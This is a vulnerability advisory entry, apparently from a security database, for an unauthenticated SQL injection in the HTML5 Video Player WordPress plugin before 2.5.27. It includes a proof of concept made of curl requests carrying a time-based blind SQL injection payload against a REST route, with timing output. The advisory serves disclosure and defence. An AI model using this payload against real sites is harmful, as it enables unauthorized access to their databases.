Lucene search

K
wpvulndbMayank DeshmukhWPVDB-ID:BC76EF95-A2A9-4185-8ED9-1059097A506A
HistoryMay 30, 2024 - 12:00 a.m.

HTML5 Video Player < 2.5.27 - Unauthenticated SQLi

2024-05-3000:00:00
Mayank Deshmukh
wpscan.com
8
html5
video player
unauthenticated
sql injection
rest route
sql statement
security vulnerability

AI Score

7.2

Confidence

High

EPSS

0.001

Percentile

22.6%

Description The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

PoC

% time curl “https://example.com/?rest_route=/h5vp/v1/video/1&amp;id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.02s system 0% cpu 5.760 total % time curl “https://example.com/?rest_route=/h5vp/v1/video/1&amp;id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.01s system 1% cpu 1.204 total

AI Score

7.2

Confidence

High

EPSS

0.001

Percentile

22.6%

Related for WPVDB-ID:BC76EF95-A2A9-4185-8ED9-1059097A506A